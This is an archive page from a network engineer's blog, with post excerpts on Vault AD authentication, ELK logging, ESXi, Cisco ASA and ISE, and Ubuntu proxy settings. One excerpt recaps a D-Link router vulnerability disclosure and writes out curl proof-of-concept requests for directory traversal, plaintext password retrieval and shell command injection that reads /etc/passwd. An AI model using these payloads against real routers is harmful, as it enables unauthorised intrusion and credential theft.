The Insecure Wire

a network engineers perspective

Category Archives: Uncategorized

Setting up AD Auth with Hashicorp Vault

Hashicorp Vault is open source and can be used in DevOps processes for secure automated retrieval of keys and secrets. I recently setup Vault as a password / key store. Here is how to configure Vault for Active Directory LDAP authentication. This setup assumes the following: ‘sAMAccountID’ is the username attribute within AD for the […]

ELK Stack with Palo Alto Firewall – Using Curator to clear indexes

I recently deployed an ELK stack (Elasticsearch, Logstash, Kibana) VM as logger for a Palo Alto Networks firewall. ELK is open source and allows you to create beautiful dashboards in Kibana. I followed the following guide for integrating PAN firewall with ELK palo-alto-elasticstack-viz. The issue I was having is that Elastic indexes would continue to […]

VMware ESXi Setting iphash load balancing via CLI

I recently setup x2 new ESXi 6.7u1 servers without access to each hosts LAN. I needed to configure the correct vSwitch failover setting so that the port channel uplinks would work correctly: 1. Enable SSH console from the management settings > troubleshooting options on the ESXi console. 2. Bring up the CLI console with alt […]

Cisco ASA Dynamically open MS-RPC Ports

OK so this one is simple once you know how. TCP Port 135 (MS Remote Procedure Call Endpoint Mapper) requests high range ports > 1024 for Windows client / server networking. To allow this traffic across the ASA you need to pinhole the ports with the global policy map: policy-map type inspect dcerpc dcerpc_map parameters […]

Cisco ASA show CLI passwords

What’s the command so that you can see hashed passwords on the Cisco ASA CLI? Answer: ciscoasa(config)# more system:running-config Very handy for when you need to copy passwords from one device to the other.

Cisco ISE Unable to load Context Visibility page. Ensure that reverse DNS lookup is configured for all Cisco ISE nodes in your distributed deployment in the DNS server(s)

What a mouthful! So I was changing roles and deployment on our Cisco ISE back end yesterday (2.3.0.298) when I ran into an interesting visual error on the primary administration node: Turns out in your DNS server the reverse lookup has to match the hostname (A Records) of the ISE node(s). So my issue was […]

Using Ubiquiti AirMax with Cisco dot1q Trunking

We recently encountered an issue wherein a particular training building required network access. It was actually a shed used to teach carpentry and bricklaying etc. As this building never had fiber optic or conduit connected to it, a cost effective solution was sought after. I decided to use Ubiquiti Networks AirMAX Prism 2 product. I […]

Multiple vulnerabilities in D-Link Routers

Released on Friday 12/10/18: Multiple vulnerabilities in D-Link routers Directory Traversal in httpd server in several series of D-Link routers: $ curl http://routerip/uir//etc/passwd Password stored in plaintext in several series of D-Link routers: $ curl http://routerip/uir//tmp/XXX/0 Shell command injection in httpd server of a several series of D-Link routers: $ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20 %2Fetc%2Fpasswd

Cannot extend datastore through vCenter Server

Today on the random VMware “feature” list – extended a datastore. So on the EMC SAN side the LUN was increased and vSphere client (vCenter) could see the extended drive. However you could not extended the datastore via the wizard. Very interesting – quick google yeilded; Cannot extend datastore through vCenter Server So basically vCenter […]

Adding system wide proxy to Ubuntu 18.04 Sever

Here’s how to do it: Log into the CLI of your Ubuntu 18.04 server. sudo su sudo nano /etc/environment Now add in your proxy variables in the following format: http_proxy=”http://my.proxyserver.net:8080/” https_proxy=”http://my.proxyserver.net:8080/” ftp_proxy=”http://my.proxyserver.net:8080/” no_proxy=”localhost,127.0.0.1,::1 Disconnect from CLI and login again for /etc/environment to take affect.